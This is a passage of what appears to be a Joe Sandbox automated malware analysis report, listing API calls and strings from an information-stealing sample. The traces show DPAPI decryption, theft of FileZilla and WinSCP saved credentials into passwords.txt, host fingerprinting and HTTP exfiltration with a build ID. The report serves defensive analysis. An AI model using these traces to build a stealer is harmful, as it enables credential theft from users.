                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 009324CB
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 009324DD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 009324F6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                              • String ID: steam.exe
                                                                                                                                                                                                              • API String ID: 1799959500-2826358650
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,0095670A,?,?), ref: 00930DE1
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00930DEF
                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00930DFD
                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00930E2C
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00930ED4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                              • API String ID: 507856799-4001269591
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 0093255E
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00937FBD,.exe,00956CD4,00956CD0,00956CCC,00956CC8,00956CC4,00956CC0,00956CBC,00956CB8,00956CB4,00956CB0,00956CAC), ref: 0093257D
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 0093258D
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0093259F
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 009325B1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 009325C5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1799959500-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00956918,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC,Install Date: ), ref: 00931106
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0093110D
                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00931129
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0093114F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                              • String ID: %d MB
                                                                                                                                                                                                              • API String ID: 3644086013-2651807785
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0092823B), ref: 009280C4
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,0092823B,?,?,0092823B,0092CB6A,?,?,?,?,?,?,?,0092CC65,?,?), ref: 009280D8
                                                                                                                                                                                                              • LocalFree.KERNEL32(0092CB6A,?,?,0092823B,0092CB6A,?,?,?,?,?,?,?,0092CC65,?,?), ref: 009280FD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                              • String ID: DPAPI
                                                                                                                                                                                                              • API String ID: 2068576380-1690256801
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0095670F,?,?), ref: 009314A9
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 009314B9
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 00931517
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00931522
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 907984538-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00930D1E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00930D25
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 00930D34
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00930D52
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 362916592-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009213B9), ref: 00930C34
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,009213B9), ref: 00930C3B
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,009213B9), ref: 00930C4F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1206570057-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2452939696-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00921503,avghookx.dll,009386D0), ref: 009214DF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1586166983-0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00925519
                                                                                                                                                                                                                • Part of subcall function 00931E32: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,00B7E708,?,?,?,009328E1,?,?,00000000), ref: 00931E52
                                                                                                                                                                                                                • Part of subcall function 00931E32: GetProcessHeap.KERNEL32(00000000,?,?,?,?,009328E1,?,?,00000000), ref: 00931E5F
                                                                                                                                                                                                                • Part of subcall function 00931E32: HeapAlloc.KERNEL32(00000000,?,?,?,009328E1,?,?,00000000), ref: 00931E66
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956976,0095695B,00956957,0095694B), ref: 00925588
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 009255AA
                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009256C0
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00925704
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00925736
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,",file_data,00957848,------,0095783C,?,",00957830,------,00957824,65158feadb3cebfa5c9a9e36f0d461fe,",build_id,0095780C,------), ref: 00925C67
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00925C7A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00925C92
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00925C99
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00925CA6
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00925CB4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?), ref: 00925CC9
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00925CD6
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00925CE4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 00925CF2
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00925D05
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 00925D1A
                                                                                                                                                                                                              • HttpSendRequestA.WININET(?,?,00000000), ref: 00925D2D
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00925D6F
                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,000007CF,?), ref: 00925E26
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,block), ref: 00925E3B
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00925E46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                                              • String ID: ------$"$"$"$"$--$------$------$------$------$65158feadb3cebfa5c9a9e36f0d461fe$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                              • API String ID: 2638065154-1314835941

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 00931DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0092E753
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,009568FF,009568FE,009568EF,009568EE), ref: 0092E799
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092E7A0
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 0092E7B4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092E7BF
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0092E7F3
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092E7FE
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 0092E82C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092E837
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0092E865
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092E870
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092E8D6
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092E8EA
                                                                                                                                                                                                              • lstrlenA.KERNEL32(0092EC91), ref: 0092EA12
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092E18C
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092E1AC
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092E1BD
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092E1CE
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092E202
                                                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0092E233
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092E24B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092E272
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092E292
                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0092E2B5
                                                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,009568D7), ref: 0092E34E
                                                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0092E3AE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                                              • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt

                                                                                                                                                                                                              Control-flow Graph

[Control-flow graph 568 of the function at 00925F39; legend: Executed / Not Executed. The API calls made by this function are listed under APIs below.]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00925FD8
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 00925FF6
                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0092618E
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 009261D2
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,",mode,009578D0,------,009578C4,65158feadb3cebfa5c9a9e36f0d461fe,",build_id,009578AC,------,009578A0,",00957894,------), ref: 009265FD
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092660C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00926617
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092661E
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092662B
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00926639
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00926647
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 00926655
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00926662
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 00926677
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00926685
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 009266E2
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 009266ED
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 009266F9
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00926705
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00926200
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                              • String ID: "$"$"$------$------$------$------$65158feadb3cebfa5c9a9e36f0d461fe$build_id$mode
                                                                                                                                                                                                              • API String ID: 3702379033-3253832395

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
